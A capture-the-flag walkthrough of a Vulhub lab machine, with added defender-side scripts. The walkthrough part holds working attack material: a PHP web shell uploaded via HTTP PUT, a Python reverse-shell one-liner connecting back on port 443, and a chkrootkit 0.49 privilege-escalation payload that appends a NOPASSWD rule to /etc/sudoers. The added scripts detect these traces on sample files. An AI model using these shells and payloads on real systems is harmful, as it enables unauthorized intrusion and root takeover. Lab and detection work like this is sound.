From Vulhub


  • netdiscover
  • Nmap
  • Nikto
  • Wfuzz
  • Curl

Use netdiscover to find the target's IP address.

netdiscover -i eth0 -r is the target.

Then run nmap to find open ports and the services running on the target machine.

nmap -sV -v -O -A -T5 -p-

Looks like port 22 and port 80 are open.

Check the

Nothing exciting.

Use Nikto:

Still nothing interesting.

Try wfuzz:

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 2>/dev/null

It finds a test directory:

Next, examine which HTTP methods the server allows (OPTIONS):

curl -v -X OPTIONS

Looks like it supports PUT.
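From the defender's side, the same OPTIONS response is the thing to audit: any write-capable method in the Allow header on a directory that does not need it is a misconfiguration. The following is an added example, not code from the original writeup; it parses a constructed OPTIONS response shaped like the one curl returns above and lists the methods that would let a client modify the document root.

```shell
#!/bin/sh
# Added example, not part of the original writeup. The response text below is constructed to
# resemble the OPTIONS reply curl shows in the writeup; nothing is fetched from a live host.

SAMPLE_OPTIONS_RESPONSE='HTTP/1.1 200 OK
Date: Mon, 01 Jan 2024 00:00:00 GMT
Server: Apache
Allow: GET,HEAD,POST,OPTIONS,PUT,DELETE
Content-Length: 0'

# Print each write-capable method advertised in the Allow header, one per line.
# Steps: strip CRs, keep the Allow line, take everything after the colon, split on commas,
# drop spaces, normalise case, and keep only methods that create, change or remove content.
write_methods() {
    printf '%s\n' "$1" |
    tr -d '\r' |
    grep -i '^Allow:' |
    cut -d: -f2- |
    tr ',' '\n' |
    tr -d ' ' |
    tr '[:lower:]' '[:upper:]' |
    grep -E '^(PUT|DELETE|PATCH|PROPFIND|PROPPATCH|MKCOL|COPY|MOVE)$'
}

# Print how many write-capable methods the response advertises (0 when the Allow header is clean).
write_method_count() {
    write_methods "$1" | grep -c .
}

# Demo on the constructed response: prints PUT and DELETE, then the count 2.
write_methods "$SAMPLE_OPTIONS_RESPONSE"
echo "write-capable methods advertised: $(write_method_count "$SAMPLE_OPTIONS_RESPONSE")"
```

The Allow header is only the server's own advertisement, so the decisive check is whether a PUT actually succeeds (the nmap http-put step below is exactly that test). On Apache the usual fix for a directory such as the test directory found here is a `<LimitExcept GET POST HEAD>` block containing `Require all denied`, so that PUT and DELETE are refused regardless of what the DAV or handler configuration says.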

Now upload a PHP reverse shell (I tried different ports; only port 443 seems to work):

nmap -p80 --script http-put --script-args http-put.url='/test/shell.php',http-put.file='shell.php'

Now the shell is uploaded:

Get the reverse shell:

A better PHP shell:

<?php system($_GET["exec"]); ?>

Upload this shell, and in the browser pass this as the exec parameter:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Get the shell.

During the enumeration step, I follow g0tmi1k:

ls -l /etc/cron.daily

After enumeration, I find the system has chkrootkit installed:

dpkg -l | grep chkrootkit

The chkrootkit version is 0.49, which is vulnerable: its daily cron run executes a file named /tmp/update as root.

searchsploit chkrootkit

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

Also make the update file executable (chmod 777 /tmp/update) and wait for the cron job to run:

ls -al /etc/sudoers


sudo su
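This escalation leaves two clear traces on the host: a world-writable /tmp/update (the file chkrootkit 0.49 executes as root) and a NOPASSWD rule for www-data appended to /etc/sudoers, whose mode also flips to 777 for the duration of the payload. The script below is an added example, not code from the original writeup; it runs those checks against files constructed in a temporary directory so it is safe to try anywhere, and the same functions can be pointed at the real /etc/sudoers and /tmp/update during incident response.

```shell
#!/bin/sh
# Added example, not part of the original writeup: defender-side checks for the traces the
# chkrootkit 0.49 escalation leaves behind. Version 0.49 runs /tmp/update as root from its daily
# cron job, and the payload in the writeup appends a NOPASSWD rule to /etc/sudoers.
# The files created under the temporary directory below are constructed for the demo.

# Print the number of NOPASSWD rules in a sudoers file whose principal (first field) is not in
# the allow-list passed as a space-separated second argument. Comment lines are ignored.
unexpected_nopasswd_rules() {
    grep -v '^[[:space:]]*#' "$1" 2>/dev/null |
    grep 'NOPASSWD' |
    awk -v allowed="$2" '
        BEGIN { n = split(allowed, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        !($1 in ok) { c++ }
        END { print c + 0 }'
}

# Print "ok" when the sudoers file has mode 0440 and "bad" otherwise. The payload chmods the
# file to 777 and back; if the cron job is interrupted in between, it stays world-writable.
sudoers_mode_check() {
    if [ -n "$(find "$1" -maxdepth 0 -perm 440 2>/dev/null)" ]; then echo ok; else echo bad; fi
}

# Print "present" when the given path exists and is world-writable (what a planted /tmp/update
# looks like), "absent" when there is no such file, and "owned" when it exists but is not
# world-writable (still worth a look, but not the standard payload drop).
planted_update_check() {
    [ -e "$1" ] || { echo absent; return 0; }
    if [ -n "$(find "$1" -maxdepth 0 -perm -002 2>/dev/null)" ]; then
        echo present
    else
        echo owned
    fi
}

# Demo on constructed files: a temporary directory stands in for /etc and /tmp.
demo_dir=$(mktemp -d)
printf 'root ALL=(ALL:ALL) ALL\n%%sudo ALL=(ALL:ALL) ALL\nwww-data ALL=NOPASSWD: ALL\n' > "$demo_dir/sudoers"
chmod 777 "$demo_dir/sudoers"
printf '#!/bin/sh\n' > "$demo_dir/update"
chmod 777 "$demo_dir/update"

echo "unexpected NOPASSWD rules: $(unexpected_nopasswd_rules "$demo_dir/sudoers" "")"
echo "sudoers mode: $(sudoers_mode_check "$demo_dir/sudoers")"
echo "planted update file: $(planted_update_check "$demo_dir/update")"
rm -rf "$demo_dir"
```

On a real host the allow-list argument would name the accounts that legitimately hold NOPASSWD rules (often none); a www-data entry is never legitimate. The long-term fix is to upgrade chkrootkit past 0.49, since the root cause is the cron job trusting a file in a world-writable directory.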